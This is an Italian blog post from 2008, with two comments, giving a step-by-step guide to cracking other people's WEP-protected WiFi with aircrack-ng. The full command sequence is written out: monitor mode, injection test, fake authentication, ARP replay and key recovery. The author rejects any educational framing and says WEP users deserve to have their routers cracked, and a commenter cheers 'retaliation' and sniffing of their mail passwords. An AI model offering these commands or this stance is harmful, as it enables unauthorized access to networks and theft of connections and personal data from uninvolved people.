Ricerca tra la vecchia roba

Craccare rete WiFi protetta da WEP con una scheda RaLink RT2561/RT61

Posted: Novembre 20th, 2008 | Author: | Filed under: Hack | 2 Comments »

Non mi ricordo neanche più perché avevo accattato una scheda wireless PCI per il mio desktop, forse proprio per fare quello che ho fatto e che adesso vi spiegherò.

Prima di tutto non usare i driver che fornirebbe la ralink (che sono closed) ma usate quelli del progetto http://rt2x00.serialmonkey.com, che ormai sono inclusi nel tree del kernel e che nel mio caso corrispondono al modulo rt61pci. La versione del kernel è 2.6.26-1-686, quella del modulo 2.1.4, quella di aircrack-ng è 1:1.0~rc1-2 (tutto su una debian Lenny).

Prima di tutto si passa al modo promiscuo (probabilmente andrà contro i precetti del tuo Dio ma non ti preoccupare, craccheremo anche lui) attraverso il comando

# airmon-ng start wlan0

vi dovreste ritrovare con una bella interfaccia wireless nuova chiamata mon0 (cisti che eseguire più volte il comando crea più interfacce che però non so quanto servano); Per testare se effettivamente il ciocco works usare

# aireplay-ng -9 -i wlan0 mon0

(-9 è l’opzione di testing) e se esce una riga "Injection is working" allora siamo a buon punto; inoltre dovrebbe farvi vedere quali attacchi sono supportati dalla scheda (prossimamente magari un post sulle vulnerabilità del protocollo sarà d’obbligo).

Adesso sniffiamo pacchetti (non la droga ragazzi!!! fa male!!! non fatevi le pere di mariuana): attraverso il comando

# airodump-ng -c <channel> –bssid <MAC AP> -w <file> mon0

si visualizzerà l’access point (AP) e i pacchetti che riuscite a sgamargli. Lasciate il comando attivo e su un altro terminale, agite tramite fake authentication con il comando

# aireplay-ng -1 0 -e <essid> -a <MAC AP> -h  <OUR MAC> mon0

che se va a buon fine allora potete lanciare il comando

# aireplay-ng -3 -b <MAC AP> -h <OUR MAC> mon0

e dovreste vedere nella finestra di airmon-ng i pacchetti "iv" crescere a colpi di 20/s; quando arrivate a circa 250k (a me ci sono volute 3h&frac12;) potete tentare con

#aircrack-ng -b <MAC AP> <file>*.cap

e nel caso magicamente troverete la chiave e forse una rete fastweb da 1.1MB/s 😉

Ovviamente da questa guida non si capisce un cazzo, ma principalmente è un sunto di questa pagina: simple wep crack direttamente dal sito aircrack-ng.org.

P.S: qua dovrei dire che quanto detto è solo a scopo educativo, ma me ne sbatto, se uno usa ancora una chiave WEP nel 2008 un po’ se lo merita che gli cracchiate il router NETGEAR a cui neanche ha cambiato la password 😛


2 Comments on “Craccare rete WiFi protetta da WEP con una scheda RaLink RT2561/RT61”

  1. 1 iff said at 9:43 pm on Novembre 20th, 2008:

    Fra l’altro la password non la CAMBIANO MAI!!!Cioè mai cazzo! O è password password o è admin admin oppure è una roba tipo login vuoto e password password.

    Al di la di ‘ste robe tristi e del fatto che è giusto invocare la rappresaglia su chi usa ancora il wep facendosi sniffare dalle connessioni in chiaro la password per accedere alla loro casella mail commerciale su cui tengono il numero COMPLETO DI CARTA IDENTITA’ e migliaia di altri loro dati personali….

    Stavo dicendo? Ah si…

    Al di là di ste robe tristi… se ti interessa noi abbiamo fatto la traduzione di parecchie guide dal sito di aircrack-ng. Se ti interessano le puoi trovare qui:

    http://infofreeflow.noblogs.org/category/wireless

    Se non ti interessano ti vorremmo bene ma non troppo.

    YO MAN. Sei nel posto.

    Io non amo la formalità.

  2. 2 packz said at 10:12 pm on Novembre 20th, 2008:

    Yo bro’, il blog di infofreeflow ce l’avevo già nei feed… abbasso la WEP e i dati in chiaro…